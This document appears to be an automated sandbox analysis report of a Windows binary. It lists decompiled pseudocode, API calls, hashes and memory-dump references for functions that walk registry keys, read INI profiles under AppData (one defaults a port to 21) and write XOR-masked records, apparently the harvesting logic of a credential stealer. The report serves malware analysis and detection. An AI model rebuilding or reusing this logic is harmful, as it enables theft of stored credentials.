Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$CombineCountCreateDirectoryTempTick
String ID: %s%08x$tmp
API String ID: 1218007593-1196434543
Opcode ID: edd561af6a843b1339d7679a902f7c762362cff48795dc9e72f655cd8cbf19b2
Instruction ID: 4b127c912a2393b1ddf5e7c1c55cff86fe39688baeb91cacfc36c6706d6fe6ad
Opcode Fuzzy Hash: edd561af6a843b1339d7679a902f7c762362cff48795dc9e72f655cd8cbf19b2
Instruction Fuzzy Hash: 7EF0447A20031466DE206A28DD05BEF77A8DB10310F004272FE56E21E0D678CED6869C

Uniqueness

Uniqueness Score: -1.00%

Function 00416FC8, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416FC8(WCHAR* _a4) {
				signed int _t4;
				short _t9;
				signed short _t10;
				WCHAR* _t11;
				WCHAR* _t12;
				int _t18;

				_t12 = _a4;
				_t9 = 0;
				_t11 = PathSkipRootW(_t12);
				if(_t11 == 0) {
					_t11 = _t12;
				}
				while(1) {
					_t4 =  *_t11 & 0x0000ffff;
					if(_t4 == 0x5c || _t4 == 0x2f || _t4 == 0) {
						goto L5;
					}
					L11:
					_t11 =  &(_t11[1]);
					continue;
					L5:
					_t10 = _t4;
					 *_t11 = 0;
					if(GetFileAttributesW(_t12) == 0xffffffff) {
						_t18 = CreateDirectoryW(_t12, 0);
					}
					if(_t18 == 0) {
						L13:
						return _t9;
					} else {
						if(_t10 == 0) {
							_t9 = 1;
							goto L13;
						}
						 *_t11 = _t10;
						goto L11;
					}
				}
			}

0x00416fca
0x00416fd1
0x00416fd9
0x00416fdd
0x00416fdf
0x00416fdf
0x00416fe1
0x00416fe1
0x00416fe7
0x00000000
0x00000000
0x0041701f
0x0041701f
0x00000000
0x00416ff3
0x00416ff3
0x00416ff8
0x00417004
0x0041700f
0x0041700f
0x00417015
0x00417029
0x0041702c
0x00417017
0x0041701a
0x00417024
0x00000000
0x00417024
0x0041701c
0x00000000
0x0041701c
0x00417015

APIs

PathSkipRootW.SHLWAPI(?,.exe,00000000,?,00000000,0041CE59,?,?,?,?,?), ref: 00416FD3
GetFileAttributesW.KERNEL32(?,?,00000000,0041CE59,?,?,?,?,?), ref: 00416FFB
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0041CE59,?,?,?,?,?), ref: 00417009

Strings

.exe, xrefs: 00416FCF

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesCreateDirectoryFilePathRootSkip
String ID: .exe
API String ID: 4231520044-4119554291
Opcode ID: 76dfddc1a029c9a74099b6bda70c74c4ab68234f9fa43a7f345e042a9f995628
Instruction ID: 389cddabf3638a5cceb577c84acea22344677a9bfabe09dbb732a5faa5b1e13a
Opcode Fuzzy Hash: 76dfddc1a029c9a74099b6bda70c74c4ab68234f9fa43a7f345e042a9f995628
Instruction Fuzzy Hash: 1BF04C3714530056D6300E2A6C04AE7B7A9DE157A0B66493BFD91D3350D739DCC2D26C

Uniqueness

Uniqueness Score: -1.00%

Function 004131C8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004131C8(void* __ecx) {
				signed int _v8;
				struct HINSTANCE__* _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetModuleHandleW(L"kernel32.dll");
				if(_t7 == 0) {
					L4:
					return _t7 & 0xffffff00 | _v8 != 0x00000000;
				} else {
					_t7 = GetProcAddress(_t7, "IsWow64Process");
					if(_t7 == 0) {
						goto L4;
					} else {
						_t7 = _t7->i(0xffffffff,  &_v8);
						if(_t7 != 0) {
							goto L4;
						} else {
							return 0;
						}
					}
				}
			}

0x004131cc
0x004131d5
0x004131dd
0x004131ff
0x00413207
0x004131df
0x004131e5
0x004131ed
0x00000000
0x004131ef
0x004131f5
0x004131f9
0x00000000
0x004131fb
0x004131fe
0x004131fe
0x004131f9
0x004131ed

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00405C01,00000000,00406128), ref: 004131D5
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004131E5

Strings

kernel32.dll, xrefs: 004131D0
IsWow64Process, xrefs: 004131DF

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32.dll
API String ID: 1646373207-3024904723
Opcode ID: 78c6ec8dd5f8c19e8780382f3605e14fb917f9651ddd33c77cabacaefac4c6b1
Instruction ID: 2f59b1bf19ed58ff7e5604f6e410fa3e2b8360f9c30eccc8fe19d67955a0b3e1
Opcode Fuzzy Hash: 78c6ec8dd5f8c19e8780382f3605e14fb917f9651ddd33c77cabacaefac4c6b1
Instruction Fuzzy Hash: FAE04870200205B7DF009FA59D07B9B779C5B01796F1402A9B011F21D0EAF8DB4C955C

Uniqueness

Uniqueness Score: -1.00%

Function 0041B924, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041B924(intOrPtr _a4, intOrPtr _a12) {
				void* __esi;
				void* _t6;
				signed int _t7;

				if(_a12 == 0x64 || _a12 == 0x33) {
					EnterCriticalSection(0x423df4);
					_t7 = E0041B2EB(_a4);
					if(_t7 != 0xffffffff) {
						_t7 = SetEvent( *(_t7 * 0x24 +  *0x423d8c + 4));
					}
					LeaveCriticalSection(0x423df4);
					return _t7;
				}
				return _t6;
			}

0x0041b929
0x0041b93a
0x0041b944
0x0041b94c
0x0041b95b
0x0041b95b
0x0041b962
0x00000000
0x0041b969
0x0041b96a

APIs

EnterCriticalSection.KERNEL32(00423DF4), ref: 0041B93A
SetEvent.KERNEL32(?), ref: 0041B95B
LeaveCriticalSection.KERNEL32(00423DF4), ref: 0041B962

Strings

3, xrefs: 0041B92B

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: 3
API String ID: 3094578987-1842515611
Opcode ID: 472c320ed590743a78bd2ae0bb93211018dc1e2a304350d54b9522dbb2e214e9
Instruction ID: 65408f406772979773c06b25283888ead931e93f8e655ba5db33f56392e03ec9
Opcode Fuzzy Hash: 472c320ed590743a78bd2ae0bb93211018dc1e2a304350d54b9522dbb2e214e9
Instruction Fuzzy Hash: 6EE06D31204110ABC7105B26AD4889ABB74EA96326B04C57FF616A2170C738C843CA99

Uniqueness

Uniqueness Score: -1.00%

Function 0040EE10, Relevance: 6.2, APIs: 4, Instructions: 184
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040EE10(char* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				char _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v68;
				char _v88;
				char _v108;
				char _v132;
				char _v172;
				short _v260;
				short _v780;
				void* __edi;
				void* __esi;
				intOrPtr _t65;
				intOrPtr _t92;
				int _t104;
				void* _t110;
				intOrPtr _t112;
				void* _t115;
				int _t120;
				void* _t125;
				void* _t132;
				void* _t135;
				void* _t136;

				_t119 = __edx;
				_t118 = __ecx;
				_t120 = 0;
				E00411A74( &_v32,  &_v32, 0, 8);
				_t65 = E00411991(0xc1c);
				_v16 = _t65;
				if(_t65 == 0) {
					L22:
					if(_v28 <= _t120) {
						return E004119C1(_v32);
					}
					return E0040C9F4(_t119, _v32, 0xcb);
				} else {
					_v36 = _t65 + 0x3fc;
					_v48 = 0x80000001;
					_v44 = 0x80000002;
					E00419DD3(0x8a,  &_v260);
					E00419DD3(0x8b,  &_v88);
					E00419DD3(0x8c,  &_v132);
					E00419DD3(0x8d,  &_v68);
					E00419DD3(0x8e,  &_v108);
					_v12 = 0;
					do {
						if(RegOpenKeyExW( *(_t135 + _v12 * 4 - 0x2c),  &_v260, _t120, 8,  &_v8) != 0) {
							goto L20;
						}
						_v24 = _t120;
						_v20 = 0x104;
						if(RegEnumKeyExW(_v8, _t120,  &_v780,  &_v20, _t120, _t120, _t120, _t120) != 0) {
							L19:
							RegCloseKey(_v8);
							goto L20;
						} else {
							goto L4;
						}
						L17:
						_v20 = 0x104;
						if(RegEnumKeyExW(_v8, _v24,  &_v780,  &_v20, 0, 0, 0, 0) == 0) {
							L4:
							_t122 = _v16;
							_v24 = _v24 + 1;
							_t92 = E00415AE5(_v8, _t118, _v16,  &_v780,  &_v88, 0xff);
							_v40 = _t92;
							if(_t92 != 0xffffffff && _t92 != 0) {
								_t132 = E00415AE5(_v8, _t118, _t122 + 0x1fe,  &_v780,  &_v68, 0xff);
								if(_t132 != 0xffffffff && _t132 != 0) {
									_t124 = _v36;
									_t104 = E00415AE5(_v8, _t118, _v36,  &_v780,  &_v108, 0xff);
									_v20 = _t104;
									if(_t104 != 0xffffffff && _t104 != 0 && E0040ED56(_t119, _t124, _t132 + _v40) > 0) {
										_t125 = E00415B9B(_v8, _t118,  &_v780,  &_v132);
										if(_t125 < 1 || _t125 > 0xffff) {
											_t125 = 0x15;
										}
										_t134 =  &_v172;
										_t110 = 0x55;
										E00419DD3(_t110,  &_v172);
										_t112 = _v16;
										_t118 = _v36;
										_push(_t125);
										_push(_t112);
										_push(_t118);
										_push(_t112 + 0x1fe);
										_t119 = 0x311;
										_t126 = _t118 + 0x1fe;
										_t115 = E004126B4(_t134, 0x311, _t118 + 0x1fe, _t134);
										_t136 = _t136 + 0x14;
										if(_t115 > 0) {
											_t118 =  &_v32;
											if(E00411DB5(_t115,  &_v32, _t126) != 0) {
												_v28 = _v28 + 1;
											}
										}
									}
								}
							}
							goto L17;
						} else {
							_t120 = 0;
							goto L19;
						}
						L20:
						_v12 = _v12 + 1;
					} while (_v12 < 2);
					E004119C1(_v16);
					goto L22;
				}
			}

0x0040ee10
0x0040ee10
0x0040ee1e
0x0040ee25
0x0040ee2f
0x0040ee34
0x0040ee39
0x0040f032
0x0040f035
0x00000000
0x0040f04e
0x00000000
0x0040ee3f
0x0040ee44
0x0040ee52
0x0040ee59
0x0040ee60
0x0040ee6d
0x0040ee7a
0x0040ee87
0x0040ee94
0x0040ee99
0x0040eea1
0x0040eebe
0x00000000
0x00000000
0x0040eed7
0x0040eeda
0x0040eee9
0x0040f014
0x0040f017
0x00000000
0x00000000
0x00000000
0x00000000
0x0040efe6
0x0040effa
0x0040f00c
0x0040eeef
0x0040eeef
0x0040eef2
0x0040ef04
0x0040ef09
0x0040ef0f
0x0040ef37
0x0040ef3c
0x0040ef4a
0x0040ef5c
0x0040ef61
0x0040ef67
0x0040ef8d
0x0040ef92
0x0040ef9e
0x0040ef9e
0x0040efa1
0x0040efa7
0x0040efa8
0x0040efad
0x0040efb0
0x0040efb3
0x0040efb4
0x0040efb5
0x0040efbb
0x0040efbf
0x0040efc4
0x0040efca
0x0040efcf
0x0040efd4
0x0040efd7
0x0040efe1
0x0040efe3
0x0040efe3
0x0040efe1
0x0040efd4
0x0040ef67
0x0040ef3c
0x00000000
0x0040f012
0x0040f012
0x00000000
0x0040f012
0x0040f01d
0x0040f01d
0x0040f020
0x0040f02d
0x00000000
0x0040f02d

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 0040EEB6
RegEnumKeyExW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 0040EEE1
RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 0040F017

Part of subcall function 00415AE5: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D971,?,?,00000104,.exe,00000000), ref: 00415AFA

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 0040F004

Part of subcall function 00415AE5: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0041D971,?,?,00000104), ref: 00415B7B

Part of subcall function 00415B9B: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0041B4FB,?,?), ref: 00415BB3

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: e854cd7dd078dc7023054acee4611ea1fd93a56925d0228768620ea15a9ba26a
Instruction ID: 0d02f69a53c4cc692e7303d5cd6b5153c7c2398ac0ea19bec22be19005736b60
Opcode Fuzzy Hash: e854cd7dd078dc7023054acee4611ea1fd93a56925d0228768620ea15a9ba26a
Instruction Fuzzy Hash: 46514CB2900119ABDB20DBA5CD45AEFB7BCEF48304F100576F951F3291DB38AE858B64

Uniqueness

Uniqueness Score: -1.00%

Function 0040F3A4, Relevance: 6.2, APIs: 4, Instructions: 176
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040F3A4(char* __ecx, void* __eflags) {
				void* _v8;
				int _v12;
				intOrPtr _v16;
				int* _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v116;
				short _v180;
				short _v700;
				void* __edi;
				void* __esi;
				intOrPtr _t55;
				int _t81;
				int _t89;
				int _t93;
				void* _t99;
				intOrPtr _t101;
				void* _t104;
				int* _t109;
				char* _t113;
				void* _t114;
				void* _t122;

				_t107 = __ecx;
				_t109 = 0;
				E00411A74( &_v28,  &_v28, 0, 8);
				_t55 = E00411991(0xc1c);
				_v16 = _t55;
				if(_t55 == 0) {
					return _t55;
				}
				_v32 = _t55 + 0x3fc;
				E00419DD3(0x97,  &_v180);
				E00419DD3(0x98,  &_v64);
				E00419DD3(0x99,  &_v76);
				E00419DD3(0x9a,  &_v52);
				E00419DD3(0x9b,  &_v40);
				if(RegOpenKeyExW(0x80000001,  &_v180, 0, 8,  &_v8) != 0) {
					L20:
					E004119C1(_v16);
					if(_v24 <= _t109) {
						return E004119C1(_v28);
					}
					return E0040C9F4(0x311, _v28, 0xcb);
				}
				_v20 = 0;
				_v12 = 0x104;
				if(RegEnumKeyExW(_v8, 0,  &_v700,  &_v12, 0, 0, 0, 0) != 0) {
					L19:
					RegCloseKey(_v8);
					goto L20;
				} else {
					do {
						_t111 = _v16;
						_v20 = _v20 + 1;
						_t81 = E00415AE5(_v8, _t107, _v16,  &_v700,  &_v64, 0xff);
						_v12 = _t81;
						if(_t81 != 0xffffffff && _t81 != 0) {
							_t89 = E00415AE5(_v8, _t107, _t111 + 0x1fe,  &_v700,  &_v52, 0xff);
							_v12 = _t89;
							if(_t89 != 0xffffffff && _t89 != 0) {
								_t113 = _v32;
								_t93 = E00415AE5(_v8, _t107, _t113,  &_v700,  &_v40, 0xff);
								_v12 = _t93;
								if(_t93 != 0xffffffff && _t93 != 0) {
									_t107 = _t113;
									if(E00412510(_t113) > 0) {
										_t114 = E00415B9B(_v8, _t107,  &_v700,  &_v76);
										if(_t114 < 1 || _t114 > 0xffff) {
											_t114 = 0x15;
										}
										_t121 =  &_v116;
										_t99 = 0x55;
										E00419DD3(_t99,  &_v116);
										_t101 = _v16;
										_t107 = _v32;
										_push(_t114);
										_push(_t101);
										_push(_t107);
										_push(_t101 + 0x1fe);
										_t115 = _t107 + 0x1fe;
										_t104 = E004126B4(_t121, 0x311, _t107 + 0x1fe, _t121);
										_t122 = _t122 + 0x14;
										if(_t104 > 0) {
											_t107 =  &_v28;
											if(E00411DB5(_t104,  &_v28, _t115) != 0) {
												_v24 = _v24 + 1;
											}
										}
									}
								}
							}
						}
						_v12 = 0x104;
					} while (RegEnumKeyExW(_v8, _v20,  &_v700,  &_v12, 0, 0, 0, 0) == 0);
					_t109 = 0;
					goto L19;
				}
			}

0x0040f3a4
0x0040f3b2
0x0040f3b9
0x0040f3c3
0x0040f3c8
0x0040f3cd
0x0040f5c7
0x0040f5c7
0x0040f3d8
0x0040f3e6
0x0040f3f3
0x0040f400
0x0040f40d
0x0040f41a
0x0040f43a
0x0040f59a
0x0040f59d
0x0040f5a5
0x00000000
0x0040f5be
0x00000000
0x0040f5b4
0x0040f453
0x0040f456
0x0040f465
0x0040f591
0x0040f594
0x00000000
0x0040f46b
0x0040f470
0x0040f470
0x0040f473
0x0040f485
0x0040f48a
0x0040f490
0x0040f4b3
0x0040f4b8
0x0040f4be
0x0040f4cc
0x0040f4de
0x0040f4e3
0x0040f4e9
0x0040f4ef
0x0040f4f8
0x0040f50d
0x0040f512
0x0040f51e
0x0040f51e
0x0040f521
0x0040f524
0x0040f525
0x0040f52a
0x0040f52d
0x0040f530
0x0040f531
0x0040f532
0x0040f538
0x0040f541
0x0040f547
0x0040f54c
0x0040f551
0x0040f554
0x0040f55e
0x0040f560
0x0040f560
0x0040f55e
0x0040f551
0x0040f4f8
0x0040f4e9
0x0040f4be
0x0040f577
0x0040f587
0x0040f58f
0x00000000
0x0040f58f

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 0040F432
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 0040F45D
RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 0040F594

Part of subcall function 00415AE5: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D971,?,?,00000104,.exe,00000000), ref: 00415AFA

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 0040F581

Part of subcall function 00415AE5: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0041D971,?,?,00000104), ref: 00415B7B

Part of subcall function 00415B9B: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0041B4FB,?,?), ref: 00415BB3

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: 51678386fd146b88d8c0e43e42052caf0dec5df9ff339fb63b05230916cd8118
Instruction ID: 8a1d7e72c5b4c3ada0ad21d32bc5af5037fc9f318339c7f5677f9063e04565c1
Opcode Fuzzy Hash: 51678386fd146b88d8c0e43e42052caf0dec5df9ff339fb63b05230916cd8118
Instruction Fuzzy Hash: 0A512CB2900108BADB20DBA5DD85AEFB7BCEF44304F140176B915F3292DB389E858B64

Uniqueness

Uniqueness Score: -1.00%

Function 004070D0, Relevance: 6.1, APIs: 4, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004070D0(void* __eflags, intOrPtr _a4) {
				signed int _v5;
				short _v20;
				char _v40;
				char _v60;
				short _v84;
				char _v112;
				char _v144;
				short _v664;
				char _v1184;
				short _v1704;
				char _v2224;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t31;
				long _t33;
				void* _t36;
				void* _t42;
				void* _t44;
				void* _t46;
				long _t50;
				short* _t58;
				char* _t65;
				short _t66;
				void* _t67;
				WCHAR* _t70;
				long _t77;

				_t31 = 0x2a;
				E00419DD3(_t31,  &_v144);
				_t33 =  &_v1184;
				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t33);
				if(_t33 == 0) {
					_t33 = E00417246( &_v144,  &_v1184,  &_v1184);
					if(_t33 != 0) {
						_t36 = 0x2c;
						E00419DD3(_t36,  &_v112);
						_t33 = E00417246( &_v112,  &_v1704,  &_v1184);
						if(_t33 != 0) {
							_t33 = GetFileAttributesW( &_v1704);
							if(_t33 != 0xffffffff) {
								_t42 = 0x2d;
								E00419DD3(_t42,  &_v60);
								_t44 = 0x2e;
								E00419DD3(_t44,  &_v84);
								_t46 = 0x2f;
								E00419DD3(_t46,  &_v20);
								_v5 = 0;
								while(1) {
									_push(_v5 & 0x000000ff);
									_push( &_v60);
									_t67 = 0xa;
									_t70 =  &_v40;
									_t50 = E004126B4( &_v60, _t67, _t70);
									if(_t50 < 1) {
										break;
									}
									_t50 = GetPrivateProfileIntW(_t70,  &_v84, 0xffffffff,  &_v1704);
									_t77 = _t50;
									if(_t77 == 0xffffffff) {
										break;
									}
									_t50 = GetPrivateProfileStringW(_t70,  &_v20, 0,  &_v664, 0x104,  &_v1704);
									if(_t50 == 0) {
										L17:
										_v5 = _v5 + 1;
										if(_v5 < 0xfa) {
											continue;
										}
										break;
									}
									_t58 =  &_v664;
									if(_v664 == 0) {
										L12:
										if(_t77 != 1) {
											_t65 =  &_v664;
											L16:
											_t50 = E00407257(0, _t65, _a4, _t90);
											if(_t50 == 0) {
												break;
											}
											goto L17;
										}
										_t50 = E00417246( &_v664,  &_v2224,  &_v1184);
										_t90 = _t50;
										if(_t50 == 0) {
											goto L17;
										}
										_t65 =  &_v2224;
										goto L16;
									} else {
										goto L9;
									}
									do {
										L9:
										if( *_t58 == 0x2f) {
											_t66 = 0x5c;
											 *_t58 = _t66;
										}
										_t58 = _t58 + 2;
									} while ( *_t58 != 0);
									goto L12;
								}
								return _t50;
							}
						}
					}
				}
				return _t33;
			}

0x004070e3
0x004070e4
0x004070e9
0x004070f7
0x004070ff
0x0040710f
0x00407116
0x00407121
0x00407122
0x00407137
0x0040713e
0x0040714b
0x00407154
0x0040715f
0x00407160
0x0040716a
0x0040716b
0x00407175
0x00407176
0x0040717b
0x0040717f
0x00407183
0x00407187
0x0040718a
0x0040718b
0x0040718e
0x00407198
0x00000000
0x00000000
0x004071ae
0x004071b4
0x004071b9
0x00000000
0x00000000
0x004071da
0x004071e2
0x00407243
0x00407243
0x0040724a
0x00000000
0x00000000
0x00000000
0x0040724a
0x004071e4
0x004071f1
0x00407207
0x0040720a
0x00407231
0x00407237
0x0040723a
0x00407241
0x00000000
0x00000000
0x00000000
0x00407241
0x00407220
0x00407225
0x00407227
0x00000000
0x00000000
0x00407229
0x00000000
0x00000000
0x00000000
0x00000000
0x004071f3
0x004071f3
0x004071f7
0x004071fb
0x004071fc
0x004071fc
0x004071ff
0x00407202
0x00000000
0x004071f3
0x00000000
0x00407250
0x00407154
0x0040713e
0x00407116
0x00407254

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 004070F7

Part of subcall function 00417246: PathCombineW.SHLWAPI(00405D8B,00405D8B,?,00405D8B,?,?), ref: 00417265

GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0040714B
GetPrivateProfileIntW.KERNEL32 ref: 004071AE
GetPrivateProfileStringW.KERNEL32 ref: 004071DA

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: PathPrivateProfile$AttributesCombineFileFolderString
String ID:
API String ID: 1702184609-0
Opcode ID: b4e43f17edb77f586e6fc78cac39189d330523aafacc10ee6f20dd1f1c65135d
Instruction ID: d2ef882d69ae63726f85b9dfd0973dcc821cee25746fde66b308505c83b0909d
Opcode Fuzzy Hash: b4e43f17edb77f586e6fc78cac39189d330523aafacc10ee6f20dd1f1c65135d
Instruction Fuzzy Hash: 53419F72D04218AADF20EAA49C85EDEB3BDAB45314F0400E7F604F71D1D774AE858A5A

Uniqueness

Uniqueness Score: -1.00%

Function 00417E54, Relevance: 6.1, APIs: 4, Instructions: 86commemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004015B0,00000000,00004401,004015A0,?,?,?,?,?,?,?,?,?,0040D346,?,?), ref: 00417E7A
VariantInit.OLEAUT32(?), ref: 00417EC6
SysAllocString.OLEAUT32(?), ref: 00417ED6
VariantClear.OLEAUT32(?), ref: 00417F0F

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$AllocClearCreateInitInstanceString
String ID:
API String ID: 3126708813-0
Opcode ID: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
Instruction ID: 32ce9fbc3ff27247e8b4a2105c3d96018cefd55006f8a723bdc245ae3875776a
Opcode Fuzzy Hash: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
Instruction Fuzzy Hash: F3217E71904228AFCB119BA4CCCCEEFBBB8EF09750F1005A5F906EB291D67599408BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00417978, Relevance: 6.1, APIs: 4, Instructions: 84
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417978(signed int __edx, void** __esi, void* _a4, signed int _a8) {
				char _v5;
				long _v12;
				void _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t26;
				signed int _t29;
				signed int _t46;
				void** _t48;

				_t48 = __esi;
				_t46 = __edx;
				_v5 = 0;
				if(_a8 <= 0xa00000) {
					_t26 = E00416CC5( *__esi);
					_v36 = _t26;
					_v32 = _t46;
					if((_t26 & _t46) != 0xffffffff && E00416CA5( *__esi, 0, 0, 2) != 0) {
						_t29 = E00416CC5( *__esi);
						_v28 = _t29;
						_v24 = _t46;
						if((_t29 & _t46) != 0xffffffff) {
							E00411A74( &_v20,  &_v20, 0, 5);
							_v20 = __esi[4] ^ _a8;
							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, _a8,  &_v12, 0) == 0 || _v12 != _a8) {
								E00416CA5( *_t48, _v28, _v24, 0);
								SetEndOfFile( *_t48);
							} else {
								_v5 = 1;
							}
						}
						FlushFileBuffers( *_t48);
						E00416CA5( *_t48, _v36, _v32, 0);
					}
				}
				return _v5;
			}

0x00417978
0x00417978
0x00417989
0x0041798c
0x00417994
0x00417999
0x0041799e
0x004179a4
0x004179bf
0x004179c4
0x004179c9
0x004179cf
0x004179d8
0x004179ea
0x004179fd
0x00417a2f
0x00417a36
0x00417a20
0x00417a20
0x00417a20
0x004179fd
0x00417a3e
0x00417a4d
0x00417a4d
0x004179a4
0x00417a58

APIs

Part of subcall function 00416CC5: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,00000000,00000000), ref: 00416CDA

Part of subcall function 00416CA5: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00417951,?,00000000,00000000,00000000,00000000), ref: 00416CB7

WriteFile.KERNEL32(?,?,00000005,00000000,00000000,?,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 004179F9
WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 00417A12
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00417A36
FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 00417A3E

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$PointerWrite$BuffersFlush
String ID:
API String ID: 1289656144-0
Opcode ID: a9a73e66bee58fe825fb6454e8012d00435f4d7c8b8c73da4c9f268369c57017
Instruction ID: b15a50d5df536a20dfb15d84f18357ea1b94287b8b6a0e11a842a36078245b78
Opcode Fuzzy Hash: a9a73e66bee58fe825fb6454e8012d00435f4d7c8b8c73da4c9f268369c57017
Instruction Fuzzy Hash: A1315E76804108EFDF119FA5CC41DEEBBB9FF08384F14852AF290A51A1E33A8A95DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040C2E3, Relevance: 6.1, APIs: 4, Instructions: 69
